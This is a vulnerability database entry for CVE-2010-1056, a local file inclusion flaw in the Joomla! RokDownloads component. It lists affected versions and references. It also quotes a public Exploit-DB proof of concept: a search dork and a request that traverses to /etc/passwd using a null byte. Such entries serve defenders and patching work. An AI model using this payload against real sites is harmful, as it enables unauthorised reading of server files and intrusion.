CVE-2010-1056
Description
Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_rokdownloads - Local File Inclusion
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
####################################################################
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rockettheme | com_rokdownloads | {"endIncluding":"1.0"} | |
| rockettheme | com_rokdownloads | 0.91 | |
| rockettheme | com_rokdownloads | 0.92 | |
| rockettheme | com_rokdownloads | 0.93 | |
| rockettheme | com_rokdownloads | 0.94 | |
| rockettheme | com_rokdownloads | 0.95 | |
| rockettheme | com_rokdownloads | 0.96 | |
| rockettheme | com_rokdownloads | 0.97 | |
| rockettheme | com_rokdownloads | 0.98 | |
| rockettheme | com_rokdownloads | 1.0 | |
| joomla | joomla\! | | |
References
- http://osvdb.org/62972
- http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txt
- http://secunia.com/advisories/38982
- http://www.exploit-db.com/exploits/11760
- http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released
- http://www.securityfocus.com/bid/38741
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56898
- http://osvdb.org/62972
- http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txt
- http://secunia.com/advisories/38982
- http://www.exploit-db.com/exploits/11760
- http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released
- http://www.securityfocus.com/bid/38741
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56898
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.